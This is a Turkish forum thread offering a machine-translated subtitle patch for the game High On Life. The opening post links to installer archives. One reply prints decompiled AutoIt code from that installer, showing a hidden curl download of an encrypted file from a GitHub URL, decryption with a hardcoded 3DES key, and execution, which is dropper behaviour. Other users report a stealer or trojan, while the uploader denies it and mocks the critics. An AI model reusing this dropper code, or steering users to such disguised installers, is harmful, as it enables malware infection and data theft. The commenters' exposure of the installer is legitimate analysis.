Şimdi Ara

High On Life (1.0.0.0) Türkçe Yama (v2) ~%97 [OpenAI GPT-3 Translate]

Bu Konudaki Kullanıcılar:
2 Misafir - 2 Masaüstü
5 sn
35
Cevap
2
Favori
27.542
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
16 oy
Öne Çıkar
Sayfa: 12
Sayfaya Git
Git
sonraki
Giriş
  • High On Life (1.0.0.0) Türkçe Yama (v2) ~%97 [OpenAI GPT-3 Translate]

İNDİR

https://cdn.discordapp.com/attachments/839873366222569512/1042191026351243324/MC_Yama_Yukleyici_V7.rar

DISCORD

https://discord.com/invite/QDezpy4QtV

Yama Versiyon v2

Oyun versiyon 1.0.0.0

KURULUM

oyun menüsünden ayarlarından alt yazı seçeneklerinden ayar yapmayı unutmayın.

STEAM;

HighOnLife içindeki Oregon.exe seçerek kurulum yapın.

GAMEPASS;

aşağıdaki rar dosyasındaki .exe yi HighOnLife\Content\ içine kopyalayın sonra kurulum yapın.

https://cdn.discordapp.com/attachments/839873366222569512/1052971829733621871/Oregon.rar

__

• Madem okadar masumsun nedir bu gizlilik böyle peki? Şöyle bi scriptlerini inceledimde herşey şifreli falan.

Kod

Yığını:
    Global Const $CALG_3DES = 26115 Local $IA = $CALG_3DES Local $HK = _CRYPT_DERIVEKEY ( "Y291c3R5X3Npa2ly" , $IA ) $INXX = "https://raw.githubusercontent.com/coustyy/t/main/ndx" RunWait ( @ComSpec & " /c curl " & $INXX & " --ssl-no-revoke -o ndx" , @LocalAppDataDir & "/Microsoft" , @SW_HIDE , 6 ) $INX1 = FileReadLine ( $INX , 1 ) $INX1 = _CRYPT_DECRYPTDATA ( $INX1 , $HK , $CALG_USERKEY ) $INX1 = BinaryToString ( $INX1 , $SB_UTF8 )

Bune böyle, admin yetkiside var uygulamada ohhh, uzak github sunucusundan şifreli dosyayı indir pcde decrypt et bi güzel çalıştır bilgisayarda, dropper yapmışsın milleti yiyorsun geç bunları.

False positive diye milleti yiyorlar birde yahu. Adam dropper yapmış, nesi false positive bunun.

İndirilen dosyada virüs yok evet zaten uzaktan indiriyor herşeyi. Tek yapması gereken bu ilgili dosyaya zararlının şifreli linkini eklemek ne güzel. Güvencemiz kim?, sen misin?

------------------------------

Forumda açık dosyasız çeviri paylaşımı yasaklansın.. Bu şahsın ilgili çevirilerinin tamamı bu şekilde.

• Gerçekse çok iyi emeğe sağlık .

• Teşekkürler elinize sağlık

< Bu ileti mobil sürüm kullanılarak atıldı >
  • yama ne durumda kullanan var mı? duruma göre oyunu satın almayı düşünüyorum

• Kurulum için atılan dosyada stealer var arkadaşlar açmayın bile.

• rediscache0 R kullanıcısına yanıt

geçmiş olsun High On Life (1.0.0.0) Türkçe Yama (v2) ~%97 [OpenAI GPT-3 Translate] 

nerden çıkıyorsa şu 1msj olan troll tipli herifler anlamadım .

kardeşim trojen vari bişey paylaşacak olsam virüstotal da yaklanan bişey yaparmyım ?

bırakın şu noob gibi virüstotal taratmasını. trojen olsa dosya tamami ile temiz görünür.

biraz mantıklı düşün.......

• hayata hiç bir başarısı olmayan herifler bur da emekten bahsediyor.....

zorla indir kullan. kullanmak zorunlu yamayı yoksa oyun çalışmaz mecbur indireceksin.

< Bu mesaj bu kişi tarafından değiştirildi zartzurt456 -- 20 Aralık 2022; 1:23:5 >
  • Oyun Türkçe Alt yazıyı hak ediyor hikaye anlatımından dolayı. Akşam Deneyeceğim Gamepass de oyunu. İnş orta halli birşey bile olsa yeteli olacaktır.

Elinize Sağlık

• Denildiği üzere High On Life/Content içine attım oregon.exe isimli dosyayı fakat bu hatayı alıyorum gamepass ile oynamaya çalıştığımda. Emin değilim ama bende sürüm 1.11.4233.0 olarak gözüküyor, yeni indirdim oyunu ve yama güncellenmemiş olabilir.

• Ajoan8 A kullanıcısına yanıt

dc de kullananlar vardı kurulumda hata yapmış olabilirsin

• TEŞEKKÜRLER

• Hesabı konuyu gördüğüm de açtım evet ilk mesajım?

Noob gibi virüstotal taraması derken? Açık açık attığınız installer discord ve github ile bağlantı kuruyor burada şüphelenmemek yanlış mı sizce?

Ayrıca dosyanız isterseniz 0/70 atsın behavior kısmı tamamen farklı bir kısım dosyayı analiz edip yaptığı işlemleri kaydediyor.

• gokdenizm G kullanıcısına yanıt

Mc yama yükleyiciyi kullanmadan yapmıştım ondan olmamış. Oregonu denilen yere atıp, yama yükleyiciden hazır hale getirmeniz gerekiyormuş, çözdüm.

< Bu mesaj bu kişi tarafından değiştirildi Ajoan8 -- 21 Aralık 2022; 2:5:25 >
    < Bu ileti mobil sürüm kullanılarak atıldı >
  • Merhaba türkçe alt yazı için teşekkür ederim fakat altyazılar çok küçük bu konu hakkında oyunda bir seçenek olmadığını biliyorum fakat herhangi bir şekilde bu altyazıyı büyütmek mümkün mü?

• beyler trojan var inanmayın bakın rar olarak atarsanız virustotale hiç birşey çıkmıyor ama içinde ki dosyayı masaüstüne atıp sorna atarsanız virustotale trojan çıkıyon ayıp bide trojan olsa bilmem ne bilmem ne yazmışsınız

• aferim çok büyük bir iş başardın :D haçkırmısın kardeş :D nasıl buldun helal olsun sana bütün sırrı bozdun yakalandık High On Life (1.0.0.0) Türkçe Yama (v2) ~%97 [OpenAI GPT-3 Translate] 

• saol knk ben miletin bilgilerini çalmayın diye yaptım ve ne yalancı insansız High On Life (1.0.0.0) Türkçe Yama (v2) ~%97 [OpenAI GPT-3 Translate] 

• 
Sayfa: 12
Sayfaya Git
Git
sonraki
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.